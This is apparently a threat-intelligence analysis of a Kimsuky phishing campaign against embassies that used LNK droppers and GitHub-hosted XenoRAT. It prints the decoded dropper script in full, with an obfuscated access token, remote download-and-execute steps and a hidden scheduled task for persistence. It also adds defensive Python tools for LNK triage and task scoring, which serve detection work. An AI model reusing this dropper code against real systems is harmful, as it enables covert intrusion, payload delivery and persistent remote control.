North Korean-linked hackers conducted espionage operations for several months this spring, targeting diplomatic missions and abusing GitHub to distribute malware and covertly control infected systems.
Another North Korean-run organization was also found to have infiltrated more than 320 companies worldwide by impersonating remote IT staff.
Spear-phishing emails were sent to diplomatic missions and Ministry of Foreign Affairs personnel.
These emails impersonated real diplomats and international organizations, and were sent around the same time as legitimate summits and forums.
The ZIP attachments contained Windows LNK files disguised as PDFs, which, when executed, triggered PowerShell commands that downloaded malicious payloads from GitHub.
The final malware deployed was a remote-control program called MoonPeak, a modified version of the open-source XenoRAT. MoonPeak is capable of system control and information theft.
The attack resembled tactics long associated with the North Korean hacking group Kimsuky, though the timeline and some traces also overlapped with China.
1. Overview
On the 20th, major foreign media outlets reported that the North Korean state-backed hacking group Kimsuky (APT43) carried out a “XenoRAT” malware campaign against embassies located in South Korea.
Source: Trellix Report
XenoRAT is a remote-access Trojan: once a host is infected it can be operated as a zombie PC, and the attacker can issue commands such as keylogging, screenshot capture, webcam access, and remote shell execution.
This section analyzes the malware distribution method recently used by the Kimsuky group in its attacks against foreign embassies in South Korea.
The overall infection chain is as follows:
Source: Trellix Report
Initial Vector – Phishing: The attack began with spear-phishing emails targeting embassy staff and Ministry of Foreign Affairs employees in South Korea. The attackers impersonated senior diplomats of the EU delegation and sent emails with ZIP attachments.
A common element in all emails was a double-extension file (test.pdf.lnk) disguised with a PDF icon or filename inside the ZIP.
Payload Delivery – Password Protected ZIP: To evade malware detection, the ZIP files were password-protected before being sent.
Execution – PowerShell: When the malicious LNK file was executed, it launched an embedded PowerShell command. Acting as a dropper, the LNK file contained Base64-encoded strings that, when executed, accessed a GitHub repository to download additional files (XenoRAT) and registered scheduled tasks.
2. LNK File Analysis
The internal structure of the LNK file is shown above. The LNK file signature begins with 0x4C 0x00 0x00 0x00. At offset 0xD4, the PowerShell path can be identified, recorded as a relative path.
The COMMAND_LINE_ARGUMENTS section reveals the input parameters used when executing PowerShell.
Breaking down the behavior of the PowerShell script step by step:
A. Decoding and Preparation for Execution
The Base64 string decodes to the following command sequence:
$hhh=Join-Path ([System.IO.Path]::GetTempPath()) "Urgent Letter from the Ambassador Embassy of Poland.pdf";$tkf="gh"+"p_9"+"f"+"x"+"xSJ"+"M"+"M"+"vI"+"hd"+"W"+"IK"+"v"+"t"+"zY"+"x"+"w6"+"LX"+"jE"+"i"+"F"+"Nj"+"4UU"+"tv"+"X";$bstr="h"+"tt"+"p"+"s:"+"/"+"/"+"r"+"aw"+".gi"+"thu"+"buser"+"c"+"o"+"ntent."+"com/lan"+"d"+"jhon"+"/"+"gre"+"en/ma"+"in/";$rstr=$bstr+"tmp.pdf";$hrs = @{Authorization="token $tkf";srjidc="dsghjkgekjhgegegegr";Accept="application/vnd.github.v3.raw"};Invoke-WebRequest -Uri $rstr -Headers $hrs -OutFile $hhh;& $hhh;$ppp = Join-Path ($env:AppData) "chrome.ps1"; $str = '$aaa = Join-Path ($env:AppData) "temp.ps1"; $bsp="'+$bstr+'ofx.txt";$hsp=@{Authorization="token '+$tkf+'";frjc="hdjgERErit783tiu";Accept="application/vnd.github.v3.raw"};Invoke-WebRequest -Uri $bsp -Headers $hsp -OutFile $aaa;& $aaa; Remove-Item -Path $aaa -Force;'; $str | Out-File -FilePath $ppp -Encoding UTF8; $action = New-ScheduledTaskAction -Execute 'PowerShell.exe' -Argument '-WindowStyle Hidden -nop -NonInteractive -NoProfile -ExecutionPolicy Bypass -Command "& {$abc = Join-Path ($env:AppData) \"chrome.ps1\"; & $abc;}"'; $trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) -RepetitionInterval (New-TimeSpan -Minutes 30); $settings = New-ScheduledTaskSettingsSet -Hidden; Register-ScheduledTask -TaskName "Microrfterterewuntecongratulaterupolandintujectioperupdate" -Action $action -Trigger $trigger -Settings $settings;$aaa = Join-Path ($env:AppData) "system_first.ps1";$rstr=$bstr+"onf.txt";Invoke-WebRequest -Uri $rstr -Headers $hrs -OutFile $aaa;& $aaa; Remove-Item -Path $aaa -Force;
The LNK command line saves this decoded content as a .ps1 file in the temporary folder and then executes it with PowerShell using the hidden-window and execution-policy-bypass options.
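The LNK layout described in this section (a 0x4C-byte header that begins with the 4C 00 00 00 size field, followed by the string data that holds the relative path and COMMAND_LINE_ARGUMENTS) can be parsed offline to triage suspicious shortcuts before anyone double-clicks them. The following is an added example, not code from the Trellix report or from the campaign: it reads the ShellLink header and StringData as laid out in Microsoft's MS-SHLLINK specification with the standard library only, then flags the indicators seen above (PowerShell target, hidden window, ExecutionPolicy Bypass, an encoded command, a double extension). The sample shortcut at the bottom is constructed for the demo and its encoded command decodes to a harmless Write-Host; the field names and finding strings are this example's own.

```python
"""Triage a Windows shortcut (.lnk) for the dropper pattern above (added example)."""
import base64
import re
import struct

LNK_HEADER_SIZE = 0x4C
# {00021401-0000-0000-C000-000000000046} in its on-disk (mixed-endian) byte order
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that starts the target minimised
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION))
ENC_RE = re.compile(r"-(?:enc(?:odedcommand)?|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)


def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags, ShowCommand and the StringData fields of a .lnk blob."""
    if len(data) < LNK_HEADER_SIZE:
        raise ValueError("too short to be a shell link")
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != LNK_HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("ShellLink header signature not found")
    show_command = struct.unpack_from("<I", data, 0x3C)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:  # skip IDListSize + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:            # LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    info = {"flags": flags, "show_command": show_command}
    for field, bit in STRING_FIELDS:     # fixed order per MS-SHLLINK
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            info[field] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            info[field] = data[pos:pos + count].decode("cp1252", errors="replace")
            pos += count
    return info


def triage_lnk(filename: str, data: bytes) -> list:
    """List the indicators a defender would flag in a suspicious shortcut."""
    info = parse_lnk(data)
    target = (info.get("relative_path", "") + " " + info.get("working_dir", "")).lower()
    args = info.get("arguments", "")
    low = args.lower()
    findings = []
    if re.search(r"\.(pdf|docx?|xlsx?|hwp)\.lnk$", filename, re.I):
        findings.append("double extension in file name")
    if "powershell" in target or "powershell" in low:
        findings.append("shortcut target is PowerShell")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("ShowCommand=SW_SHOWMINNOACTIVE (launches minimised)")
    if re.search(r"-w(?:indowstyle)?\s+hidden", low):
        findings.append("hidden window requested")
    if re.search(r"-e(?:xecutionpolicy|p)?\s+bypass", low):
        findings.append("execution policy bypass")
    m = ENC_RE.search(args)
    if m:
        try:  # -EncodedCommand carries Base64 of the UTF-16LE script text
            decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
            findings.append("encoded command decodes to: " + decoded)
        except (ValueError, UnicodeDecodeError):
            findings.append("encoded command present but not decodable")
    return findings


def build_sample_lnk(relative_path: str, arguments: str, show_command: int = 1) -> bytes:
    """Assemble a minimal .lnk (no IDList/LinkInfo) so the parser can be exercised."""
    header = struct.pack("<I16sI", LNK_HEADER_SIZE, LNK_CLSID,
                         HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE)
    header += struct.pack("<I", 0) + b"\x00" * 24      # FileAttributes, 3 FILETIMEs
    header += struct.pack("<IIIHHII", 0, 0, show_command, 0, 0, 0, 0)

    def ustr(s):
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + ustr(relative_path) + ustr(arguments)


# Constructed sample: same shape as the campaign's test.pdf.lnk, harmless payload.
BENIGN_ENC = base64.b64encode("Write-Host 'demo'".encode("utf-16-le")).decode()
SAMPLE_LNK = build_sample_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -enc " + BENIGN_ENC,
    show_command=SW_SHOWMINNOACTIVE)

if __name__ == "__main__":
    for finding in triage_lnk("Invitation.pdf.lnk", SAMPLE_LNK):
        print("[!]", finding)
```

Run it against a real attachment by reading the file bytes and passing them with the original file name; shortcuts that set HasLinkTargetIDList or HasLinkInfo are skipped over correctly, but extra-data blocks after the string data are ignored since the indicators here all live in the header and the string fields.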
B. C2 Communication
The dropper used GitHub's raw content service (raw.githubusercontent.com, serving files straight from a remote repository) as its distribution infrastructure. Each request carried the GitHub personal access token assembled in the script (the ghp_ string) in its Authorization header, together with the Accept: application/vnd.github.v3.raw header:
https://raw.githubusercontent.com/landjhon/green/main/
From here, it downloaded files such as tmp.pdf, ofx.txt, and onf.txt into local folders (the user's temporary directory and %AppData%).
C. File Execution
The files retrieved via C2 communication were renamed and executed as follows:
- tmp.pdf → Urgent Letter from the Ambassador Embassy of Poland.pdf
- ofx.txt → temp.ps1
- onf.txt → system_first.ps1
The PDF served as a decoy to distract the victim, while temp.ps1 likely downloaded additional malicious files (believed to be XenoRAT).
The system_first.ps1 file was only executed once upon download, gathering system information from the victim PC and transmitting it to the attacker.
D. Persistence
A file named chrome.ps1 was created in %AppData%. This acted as a downloader, repeatedly fetching ofx.txt (saved as temp.ps1) and executing it.
A scheduled task was registered under the obscure name “Microrfterterewuntecongratulaterupolandintujectioperupdate,” set to begin five minutes later and repeat every 30 minutes.
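The scheduled task described here leaves a very recognisable definition: a PowerShell action with -WindowStyle Hidden and -ExecutionPolicy Bypass, a script launched from %AppData%, Hidden settings, a 30-minute repetition and a long random-looking name. The following is an added example, not code from the report: it scores a task definition in the XML form that Windows records in Security event 4698 (the TaskContent field) or that schtasks /Query /XML exports. Both task definitions are constructed for the demo; the first mirrors the task in the text (its name and PowerShell arguments are taken from the script above, the start date is a placeholder), the second is a plain weekly defrag task for comparison. The finding strings and the scoring thresholds are this example's own choices.

```python
"""Score a Task Scheduler XML definition for the persistence pattern above (added example)."""
import re
import xml.etree.ElementTree as ET


def _strip_ns(root):
    """Drop the Task Scheduler namespace so element paths work with or without it."""
    for el in root.iter():
        if isinstance(el.tag, str) and el.tag.startswith("{"):
            el.tag = el.tag.split("}", 1)[1]
    return root


def duration_minutes(iso: str):
    """Parse the ISO 8601 duration Task Scheduler uses (PT30M, PT1H, P1D)."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", iso or "")
    if not m:
        return None
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 1440 + h * 60 + mi + s / 60


def score_task(task_name: str, task_xml: str) -> dict:
    """Return the traits of the campaign's task found in one task definition."""
    root = _strip_ns(ET.fromstring(task_xml))
    findings = []
    for exec_el in root.iter("Exec"):
        cmd = (exec_el.findtext("Command") or "").lower()
        low = (exec_el.findtext("Arguments") or "").lower()
        if "powershell" in cmd or "pwsh" in cmd:
            findings.append("action runs PowerShell")
        if re.search(r"-w(?:indowstyle)?\s+hidden", low):
            findings.append("hidden window requested")
        if re.search(r"-e(?:xecutionpolicy|p)?\s+bypass", low):
            findings.append("execution policy bypass")
        if re.search(r"-nop\b|-noprofile", low):
            findings.append("profile loading disabled")
        if "appdata" in low and ".ps1" in low:
            findings.append("script launched from %AppData%")
    if (root.findtext("Settings/Hidden") or "").lower() == "true":
        findings.append("task hidden from Task Scheduler UI")
    for rep in root.iter("Repetition"):  # only trigger repetition, not RestartOnFailure
        mins = duration_minutes(rep.findtext("Interval"))
        if mins is not None and mins <= 60:
            findings.append(f"repeats every {mins:g} minutes")
    name = task_name.rsplit("\\", 1)[-1]
    if len(name) >= 30 and re.fullmatch(r"[A-Za-z]+", name):
        findings.append(f"unusually long single-token task name ({len(name)} chars)")
    return {"task": task_name, "score": len(findings), "findings": findings}


# Constructed sample mirroring the task described in the text (start date is a placeholder).
SUSPECT_NAME = "Microrfterterewuntecongratulaterupolandintujectioperupdate"
SUSPECT_XML = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT30M</Interval><StopAtDurationEnd>false</StopAtDurationEnd></Repetition>
      <StartBoundary>2025-01-01T10:05:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author">
    <Exec>
      <Command>PowerShell.exe</Command>
      <Arguments>-WindowStyle Hidden -nop -NonInteractive -NoProfile -ExecutionPolicy Bypass -Command "&amp; {$abc = Join-Path ($env:AppData) \"chrome.ps1\"; &amp; $abc;}"</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed benign comparison: a weekly defrag task.
BENIGN_NAME = r"\Microsoft\Windows\Defrag\ScheduledDefrag"
BENIGN_XML = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2025-01-01T01:00:00</StartBoundary>
    <ScheduleByWeek><WeeksInterval>1</WeeksInterval></ScheduleByWeek></CalendarTrigger></Triggers>
  <Settings><Hidden>false</Hidden></Settings>
  <Actions Context="Author"><Exec><Command>%windir%\system32\defrag.exe</Command>
    <Arguments>-c -h -o -$</Arguments></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for name, xml_text in ((SUSPECT_NAME, SUSPECT_XML), (BENIGN_NAME, BENIGN_XML)):
        result = score_task(name, xml_text)
        print(result["score"], result["task"], result["findings"])
```

Fed from a SIEM, the score lets an analyst alert on event 4698 only when several traits coincide; a hidden task alone or a 30-minute repetition alone is common in legitimate software, while PowerShell with a bypassed execution policy launching a script from %AppData% on a timer is not.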
E. Cleanup
Downloaded scripts (temp.ps1, system_first.ps1) were deleted immediately after execution.
3. Mitigation
Defensive measures should include network-level blocking of the identified addresses, endpoint detection and response (EDR) with monitoring of traffic to GitHub raw-content addresses, timely updates of security solutions, and reinforced security policies.
Additionally:
- Restrict PowerShell execution policies
- Minimize Windows user privileges
- Provide security awareness training for employees on suspicious emails
These steps help reduce human error and prevent the spread of malicious activity.
4. Conclusion
The Kimsuky group has recently adopted LNK files as a means of downloading and executing additional malware from GitHub. To counter these threats, it is most effective to combine behavior-based defenses with IOC-based defenses.





